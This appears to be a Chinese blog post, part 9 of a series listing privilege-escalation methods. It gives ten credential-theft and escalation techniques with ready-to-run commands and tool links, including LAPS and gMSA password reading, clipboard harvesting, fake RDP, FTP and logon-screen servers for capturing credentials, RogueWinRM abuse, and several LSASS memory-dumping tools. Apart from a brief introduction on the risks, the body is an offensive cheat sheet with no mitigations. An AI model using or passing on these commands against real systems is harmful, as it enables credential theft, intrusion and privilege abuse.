百种提权及手段一览系列第9集

特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
在这里插入图片描述

主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。

截至目前,我们一共分享了66种提权方法,本期我们继续整理了10种热门提权方式,本期分享完后,我们一共就分享了76热门提权的方法,而离100种方法也完成快3/4了,请大家继续查收哟,:
1.Password Mining in LDAP
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
SharpLDAPSearch.exe “(&(objectClass=user)(cn=svc))” “sam用户名”
Or
Import-Module .\PowerView.ps1
Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
批注:
sharpldapsearch:https://github.com/mitchmoser/SharpLDAPSearch/releases/tag/v1.2
powerview:好多个版本,应该是这个吧?https://github.com/ericshoemaker/PowerView

2.Password Mining in Clipboard
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
execute-assembly /root/SharpClipHistory.exe
批注:https://github.com/FSecureLABS/SharpClipHistory/releases/tag/v1.0

3.Password Mining in GMSA Password
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunt
方法:
GMSAPasswordReader.exe –accountname SVC_SERVICE_ACCOUNT
批注:https://github.com/rvazarkar/GMSAPasswordReader

4.Delegate tokens via RDP
域:No
Local Admin: Yes
操作系统: Windows/Linux
类型: Delegate tokens
方法:
./fake_rdp.py
Or
pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem
批注:
fake_rdp:https://github.com/cheeseandcereal/fake-rdp
pyrdp-mitm未找到QAQ

5.Delegate tokens via FTP
域:No
Local Admin: Yes
操作系统: Windows/Linux
类型: Delegate tokens
方法:
FakeFtpServer fakeFtpServer = new FakeFtpServer();

fakeFtpServer.addUserAccount(new UserAccount(“user”, “password”, “c:\data”));

FileSystem fileSystem = new WindowsFakeFileSystem();

fileSystem.add(new DirectoryEntry(“c:\data”));

fileSystem.add(new FileEntry(“c:\data\file1.txt”, “abcdef 1234567890”));

fileSystem.add(new FileEntry(“c:\data\run.exe”));

fakeFtpServer.setFileSystem(fileSystem);

fakeFtpServer.start();

6.Fake Logon Screen
域:No
Local Admin: Yes
操作系统: Windows
类型: Delegate tokens
方法:
execute-assembly fakelogonscreen.exe
批注:https://github.com/bitsadmin/fakelogonscreen/releases/tag/1.1

7.Abusing WinRM Services
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Service
方法:
RogueWinRM.exe -p C:\windows\system32\cmd.exe
批注:https://github.com/antonioCoco/RogueWinRM/releases/tag/1.1

8.Dump lsass with SilentProcessExit
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunting
方法:
SilentProcessExit.exe pid
批注:https://github.com/deepinstinct/LsassSilentProcessExit

9.Lsass Shtinkering
域:No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunting
方法:
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps->2
LSASS_Shtinkering.exe pid
批注:https://github.com/deepinstinct/Lsass-Shtinkering

10.AndrewSpecial
域: No
Local Admin: Yes
操作系统: Windows
类型: Enumeration & Hunting
方法:
AndrewSpecial.exe
批注:https://github.com/hoangprod/AndrewSpecial

  • 19
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值